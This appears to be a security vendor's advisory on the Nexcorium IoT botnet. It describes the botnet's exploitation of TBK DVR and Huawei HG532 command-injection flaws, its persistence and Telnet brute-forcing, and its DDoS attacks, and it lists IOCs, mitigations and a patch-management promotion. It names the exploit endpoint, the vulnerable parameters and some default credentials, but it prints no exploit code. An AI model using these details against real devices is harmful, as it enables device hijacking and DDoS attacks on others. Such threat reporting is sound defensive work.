Researchers have uncovered an active IoT botnet campaign exploiting two known command-injection vulnerabilities to recruit surveillance cameras and home routers into a distributed denial-of-service (DDoS) army. Dubbed Nexcorium, this new Mirai variant uses CVE-2024-3721, an OS command-injection flaw in TBK DVR devices, as its primary entry point. Once inside, it pivots outward using a bundled exploit for CVE-2017-17215 targeting Huawei HG532 routers, then floods victim hosts with UDP, TCP, and SMTP traffic.
The goal of this operation is straightforward but damaging: hijack unpatched IoT devices at scale, build a persistent multi-architecture botnet, and weaponize that infrastructure for large-scale denial-of-service attacks against victim targets.
Vulnerabilities & Affected Products
The campaign chains two command injection vulnerabilities:
| CVE ID | CVE-2024-3721 | CVE-2017-17215 |
| Vulnerability Type | OS Command Injection (CWE-78) | Command Injection via TR-064/UPnP (CWE-77) |
| CVSS Score | 6.3 (Medium) | 8.8 (High) |
| EPSS Score | 83.86% | 92.92% |
| Affected Products | TBK DVR-4104 and DVR-4216 (firmware <= 20240412) | Huawei HG532 (all versions) |
| Fixed Version | No official vendor patch published | Patch available — Huawei PSIRT SN-20171130-01 |
| Attack Vector | Network; no authentication required in practice | Network; targets TCP port 37215 (UPnP) |
| Exploit Status | Publicly disclosed; actively exploited in the wild | Publicly disclosed since 2017; integrated into multiple Mirai variants |
| Role in Campaign | Primary entry point into TBK DVR devices | Lateral movement to Huawei routers after initial compromise |
Attack Methodology: The Automated Infection Chain
Unlike traditional intrusions that rely on a user clicking a link or entering credentials on a spoofed page, Nexcorium operates entirely through automated vulnerability exploitation. Once a TBK DVR is internet-reachable, no human interaction is required for the full infection lifecycle to complete.
Initial Exploitation: Attackers send a crafted POST request to the /device.rsp API endpoint of exposed TBK DVR devices, manipulating the mdb and mdc parameters to inject shell commands. The endpoint performs no input sanitization, making the attack trivially reliable across all affected firmware versions.
Downloader Delivery: The injected command downloads a script named dvr from attacker-controlled infrastructure. This script identifies the host device’s CPU architecture, then fetches the matching Nexcorium payload — filenames follow the pattern nexuscorp.* (e.g., nexuscorp.arm, nexuscorp.mips, nexuscorp.x86). Upon execution, the malware displays “nexuscorp has taken control” in the system console.
Payload Unpacking: Nexcorium uses XOR decoding to unpack its embedded configuration table, which contains the C2 server domain and port, persistence shell commands, a hardcoded brute-force credential list, DDoS attack parameters, and the bundled CVE-2017-17215 exploit code.
Persistence: Rather than relying on a single persistence method, the malware establishes four simultaneous footholds: modifying /etc/inittab for automatic process restarts, updating /etc/rc.local for execution at system boot, creating a persist.service systemd unit for background operation, and planting crontab entries for scheduled re-execution. After completing this setup, Nexcorium deletes its original binary to obstruct forensic analysis.
Lateral Movement: The malware immediately begins scanning the local network. It brute-forces Telnet interfaces on neighboring devices using a hardcoded list of common default credentials (including admin123, 12345, and guest). It also fires the bundled CVE-2017-17215 exploit against reachable Huawei HG532 routers — injecting shell metacharacters into SOAP XML fields to achieve remote code execution and deploy copies of itself.
C2 and DDoS Launch: Infected devices connect to the command-and-control server and await instructions. On command, they participate in volumetric DDoS attacks, flooding victim hosts via UDP, TCP, and SMTP traffic simultaneously.
MITRE ATT&CK: Tactics and Techniques
| ID | Tactic | Technique | Description |
|---|---|---|---|
| TA0001 | Initial Access | T1190 – Exploit Public-Facing Application | Exploiting CVE-2024-3721 OS command injection in the TBK DVR web interface |
| TA0002 | Execution | T1059.004 – Unix Shell | Injecting shell commands via unsanitized mdb/mdc parameters to run the downloader script |
| TA0003 | Persistence | T1543.002 – Systemd Service | Creating persist.service as an automatic background systemd unit; also reinforced via inittab, rc.local, and crontab |
| TA0005 | Defense Evasion | T1070.004 – File Deletion | Deleting the original binary post-execution to frustrate forensic analysis |
| TA0006 | Credential Access | T1110.001 – Password Guessing | Brute-forcing Telnet interfaces using a hardcoded list of common default credentials |
| TA0008 | Lateral Movement | T1210 – Exploitation of Remote Services | Deploying the CVE-2017-17215 exploit against Huawei HG532 devices to propagate the botnet |
| TA0040 | Impact | T1498 – Network Denial of Service | Launching simultaneous UDP, TCP, and SMTP flood attacks against victim hosts |
Indicators of Compromise (IOCs)
The following infrastructure and artifacts have been identified by FortiGuard Labs as being used in the Nexcorium campaign:
| Type | Indicator |
|---|---|
| IP Address | 84[.]200[.]87[.]36, 176[.]65[.]148[.]186 |
| Domain (C2) | r3brqw3d[.]b0ats[.]top |
| HTTP Header | X-Hacked-By: Nexus Team – Exploited By Erratic |
| Filename Pattern | nexuscorp.* (nexuscorp.arm, nexuscorp.mips, nexuscorp.x86) |
| Downloader Script | dvr |
| Systemd Service | persist.service |
| Exploit Endpoint | POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___ |
Visual Attack Flow
[Attacker Sends Crafted POST to TBK DVR /device.rsp Endpoint]
-> [CVE-2024-3721 OS Command Injection Executes Without Authentication]
-> [Downloader Script "dvr" Fetched and Executed on Victim Device]
-> [Architecture-Matched "nexuscorp.*" Payload Deployed (ARM/MIPS/x86-64)]
-> [XOR Configuration Table Unpacked: C2, Exploit Code, Brute-Force List]
-> [Four-Layer Persistence Established: inittab, rc.local, systemd, crontab]
-> [Original Binary Deleted to Obstruct Forensic Analysis]
-> [CVE-2017-17215 Fired at Huawei HG532 Routers for Lateral Movement]
-> [Telnet Brute-Force Against Neighboring IoT Devices with Default Credentials]
-> [Infected Devices Connect to C2 and Await DDoS Attack Commands]
-> [Volumetric DDoS Launched Against Victim Hosts via UDP, TCP, and SMTP]Key Takeaways & Mitigation
Restrict DVR Exposure. If no firmware patch is available for CVE-2024-3721, place all internet-facing TBK DVR-4104 and DVR-4216 devices behind a firewall or VPN immediately.
Patch Huawei HG532 Devices. Apply Huawei PSIRT patch SN-20171130-01 for CVE-2017-17215, or disable UPnP and block inbound traffic on TCP port 37215 if patching is not possible.
Eliminate Default Credentials. Nexcorium’s brute-force module relies entirely on factory-default passwords — changing them on all network-connected devices before deployment neutralizes this vector entirely.
Segment IoT Devices. Placing DVRs and cameras on isolated VLANs prevents a compromised device from using CVE-2017-17215 or Telnet brute-forcing to pivot into critical network assets.
Monitor for Anomalies. Alert on outbound connections to b0ats[.]top, unexpected binaries in /tmp, or the appearance of persist.service in systemd output.
Instantly Fix Risks with Saner Patch Management
Saner patch management is a continuous, automated, and integrated software that instantly fixes risks exploited in the wild. The software supports major operating systems like Windows, Linux, and macOS, as well as 550+ third-party applications.
It also allows you to set up a safe testing area to test patches before deploying them in a primary production environment. Saner patch management additionally supports a patch rollback feature in case of patch failure or a system malfunction.
Experience the fastest and most accurate patching software here.